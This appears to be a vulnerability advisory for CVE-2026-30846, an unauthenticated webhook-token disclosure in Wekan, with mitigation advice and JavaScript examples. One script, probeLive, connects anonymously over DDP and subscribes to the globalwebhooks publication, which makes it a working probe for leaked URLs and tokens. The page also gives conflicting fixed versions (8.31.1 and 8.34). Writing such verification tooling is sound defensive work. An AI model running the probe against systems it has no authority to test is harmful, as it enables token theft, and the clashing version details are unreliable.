Platform
nodejs
Component
wekan
Fixed in
8.31.1
CVE-2026-30846 is an information disclosure vulnerability affecting Wekan, an open-source kanban tool built on Meteor. The flaw allows unauthenticated attackers to retrieve sensitive webhook integration data, including webhook URLs and authentication tokens. The vulnerability impacts Wekan versions 8.31.0 through 8.33 and has been resolved in version 8.34.
The primary impact of CVE-2026-30846 is the exposure of global webhook integration data. With the leaked URLs and tokens, an attacker can reach the services that Wekan posts to and send them requests that look like legitimate Wekan webhook calls, which can lead to data breaches, unauthorized actions, and compromise of the connected applications. What makes the bug easy to hit is that the server-side publication that returns the global webhook documents performs no authentication check, so any client that can open a DDP connection to the instance can subscribe and receive the data without ever logging in. This is a recurring class of Meteor/DDP bug: a publication that returns a cursor without first checking this.userId (and, where appropriate, the user's role) is readable by anyone who can reach the WebSocket endpoint, not just by logged-in users.
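To make the access-control difference concrete, the following is an added example, not Wekan's own code: a tiny in-memory model of Meteor's publish/subscribe behaviour (a thrown error in a publish handler becomes a DDP nosub with an error; a returned result becomes added documents followed by ready) with a publication written in the vulnerable shape beside the hardened shape. The collection contents, the user records, the boardId convention for "global" integrations and the publication names are all assumptions made for the example.

```javascript
'use strict';

// Constructed sample data (assumption: a global webhook is an integration
// document with no boardId; field names url/token are illustrative).
const integrations = [
  { _id: 'int1', url: 'https://hooks.example.invalid/a', token: 'tok-secret-1', boardId: undefined },
  { _id: 'int2', url: 'https://hooks.example.invalid/b', token: 'tok-secret-2', boardId: 'board1' },
];
const users = {
  admin1: { _id: 'admin1', isAdmin: true },
  user1: { _id: 'user1', isAdmin: false },
};

// Minimal stand-in for Meteor.publish / DDP sub handling so the example runs
// without a Meteor server. Not the Meteor API, only its relevant semantics.
const publications = new Map();
function publish(name, handler) {
  publications.set(name, handler);
}

// Emulates what a DDP client sees after sending {msg:"sub"}:
//   handler returns docs  -> {status:'ready', docs}   (added... then ready)
//   handler throws        -> {status:'nosub', error}  (nosub with error)
function subscribe(name, userId) {
  const handler = publications.get(name);
  if (!handler) return { status: 'nosub', error: 'not-found' };
  const ctx = { userId: userId || null }; // null = no login call was made
  try {
    const docs = handler.call(ctx);
    return { status: 'ready', docs: docs === undefined ? [] : docs };
  } catch (err) {
    return { status: 'nosub', error: err.message };
  }
}

// Vulnerable shape: returns the global integrations to whoever subscribes.
// this.userId is never consulted, so an anonymous DDP client gets the tokens.
publish('globalwebhooks-vulnerable', function () {
  return integrations.filter((i) => i.boardId === undefined);
});

// Hardened shape: refuse before touching the collection unless the
// subscriber is a logged-in admin. Throwing is what makes Meteor send nosub.
publish('globalwebhooks-fixed', function () {
  if (!this.userId) throw new Error('not-authorized');
  const user = users[this.userId];
  if (!user || !user.isAdmin) throw new Error('not-authorized');
  return integrations.filter((i) => i.boardId === undefined);
});

// Convenience: which tokens a given subscriber ends up holding.
function leakedTokens(name, userId) {
  const r = subscribe(name, userId);
  return r.status === 'ready' ? r.docs.map((d) => d.token) : [];
}

// Stand-alone run: shows the anonymous subscriber's view of both shapes.
console.log('anonymous, vulnerable:', leakedTokens('globalwebhooks-vulnerable', null));
console.log('anonymous, fixed:', subscribe('globalwebhooks-fixed', null));
console.log('admin, fixed:', leakedTokens('globalwebhooks-fixed', 'admin1'));
```

The check has to run inside the publish handler itself; gating the UI or the client-side subscription call does nothing, because a DDP client can send the sub message directly, as the verification step later on this page does.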
CVE-2026-30846 was publicly disclosed on 2026-03-06. No public proof-of-concept (PoC) code has been released as of this writing. It is not currently listed on the CISA KEV catalog; the EPSS score is given under Exploit Status below.
Exploit Status
EPSS
0.15% (35th percentile)
CISA SSVC
The primary mitigation for CVE-2026-30846 is to upgrade Wekan to version 8.34 or later, which adds the missing access control to the publication. If upgrading immediately is not possible, restrict network access to the Wekan instance (the DDP traffic goes over the /websocket and /sockjs endpoints, so exposing the instance only to trusted networks or behind authentication at the proxy is the meaningful interim control) and monitor webhook activity for suspicious behaviour. A WAF or reverse proxy that does not inspect WebSocket frames never sees the DDP sub message, so it cannot be relied on to block the exploit, though it can still log and rate-limit connections. Because the URLs and tokens may already have been read by an anonymous client, treat the global webhook tokens as exposed and rotate them on the receiving services after upgrading. To confirm the fix, open a DDP connection to the instance with no login method call, subscribe to the globalwebhooks publication, and verify that the server answers with a nosub message carrying an error rather than added documents followed by ready.
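The verification step above can be scripted. The following is an added example, not code from Wekan or from this advisory's author: it builds the two DDP messages an unauthenticated client needs (a DDP handshake and a bare subscription to globalwebhooks, with no login in between), classifies the server's reply frames, and includes a live probe that uses the runtime's WebSocket (a global in Node 22+, or a ws-compatible constructor you pass in). The two transcripts are constructed, not captured from a real server, and the sensitive field names (url, token) and the collection name in the sample are assumptions.

```javascript
'use strict';

const SUB_ID = 'probe-1';
const PUBLICATION = 'globalwebhooks';
// Assumed field names of a webhook integration document; used to decide
// whether an "added" message actually carried secrets.
const SENSITIVE_FIELDS = ['url', 'token'];

// Frames an unauthenticated client sends: DDP handshake, then the sub.
// There is deliberately no {msg:"method", method:"login", ...} before it.
function ddpProbeMessages(subId = SUB_ID) {
  return [
    JSON.stringify({ msg: 'connect', version: '1', support: ['1'] }),
    JSON.stringify({ msg: 'sub', id: subId, name: PUBLICATION, params: [] }),
  ];
}

// Walk the server's frames until the subscription settles.
//   'denied'  nosub carrying an error        -> the fixed behaviour
//   'leaked'  added docs with url/token, then ready -> vulnerable
//   'empty'   ready (or nosub without error) with no sensitive docs
//   'pending' transcript ended before the sub settled
function classifyDdpTranscript(frames, subId = SUB_ID) {
  const added = [];
  for (const raw of frames) {
    let m;
    try { m = JSON.parse(raw); } catch { continue; } // skip non-JSON frames
    if (m.msg === 'nosub' && m.id === subId) {
      return {
        verdict: m.error ? 'denied' : 'empty',
        error: m.error ? m.error.error : undefined,
        added,
        leaked: [],
      };
    }
    if (m.msg === 'added') {
      added.push({ collection: m.collection, id: m.id, fields: Object.keys(m.fields || {}) });
    }
    if (m.msg === 'ready' && Array.isArray(m.subs) && m.subs.includes(subId)) {
      const leaked = added.filter((d) => d.fields.some((f) => SENSITIVE_FIELDS.includes(f)));
      return { verdict: leaked.length ? 'leaked' : 'empty', added, leaked };
    }
  }
  return { verdict: 'pending', added, leaked: [] };
}

// Constructed sample transcripts (not real captures). Tokens are placeholders.
const VULNERABLE_TRANSCRIPT = [
  '{"msg":"connected","session":"abc123"}',
  '{"msg":"added","collection":"integrations","id":"x1","fields":{"url":"https://hooks.example.invalid/a","token":"PLACEHOLDER"}}',
  '{"msg":"ready","subs":["probe-1"]}',
];
const FIXED_TRANSCRIPT = [
  '{"msg":"connected","session":"abc123"}',
  '{"msg":"nosub","id":"probe-1","error":{"error":"not-authorized","reason":"Not authorized"}}',
];

// Live probe against a real instance, e.g. probeLive('wss://wekan.example/websocket').
// Not run here; resolves with the classification once the sub settles or times out.
function probeLive(url, { WebSocketImpl = globalThis.WebSocket, timeoutMs = 5000 } = {}) {
  if (!WebSocketImpl) throw new Error('No WebSocket implementation; pass one via WebSocketImpl');
  return new Promise((resolve, reject) => {
    const frames = [];
    const ws = new WebSocketImpl(url);
    const timer = setTimeout(() => { ws.close(); resolve(classifyDdpTranscript(frames)); }, timeoutMs);
    ws.onopen = () => ddpProbeMessages().forEach((m) => ws.send(m));
    ws.onmessage = (ev) => {
      const raw = typeof ev.data === 'string' ? ev.data : String(ev.data);
      if (raw === '{"msg":"ping"}') ws.send('{"msg":"pong"}'); // keep the session alive
      frames.push(raw);
      const r = classifyDdpTranscript(frames);
      if (r.verdict !== 'pending') { clearTimeout(timer); ws.close(); resolve(r); }
    };
    ws.onerror = () => { clearTimeout(timer); reject(new Error('WebSocket error')); };
  });
}

// Stand-alone run over the constructed transcripts.
console.log('vulnerable server ->', classifyDdpTranscript(VULNERABLE_TRANSCRIPT).verdict);
console.log('fixed server      ->', classifyDdpTranscript(FIXED_TRANSCRIPT).verdict);
```

An 'empty' verdict is not proof of a fix: a publication can also return nothing because no global webhooks are configured, so run the probe against an instance that has at least one global webhook defined, and expect 'denied'.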
Update Wekan to version 8.34 or higher. This version fixes the vulnerability that exposes global webhook integrations without authentication. The update will prevent unauthorized access to webhook URLs and tokens.
CVE-2026-30846 is an information disclosure vulnerability in Wekan versions 8.31.0 through 8.33, allowing unauthenticated access to webhook URLs and tokens.
You are affected if you are running Wekan versions 8.31.0 through 8.33. Upgrade to version 8.34 to mitigate the risk.
Upgrade Wekan to version 8.34 or later. If immediate upgrade is not possible, restrict network access and monitor webhook activity.
There is no confirmed active exploitation of CVE-2026-30846 as of the last update, but the vulnerability's ease of exploitation warrants caution.
Refer to the Wekan project's official website and GitHub repository for the latest security advisories and updates.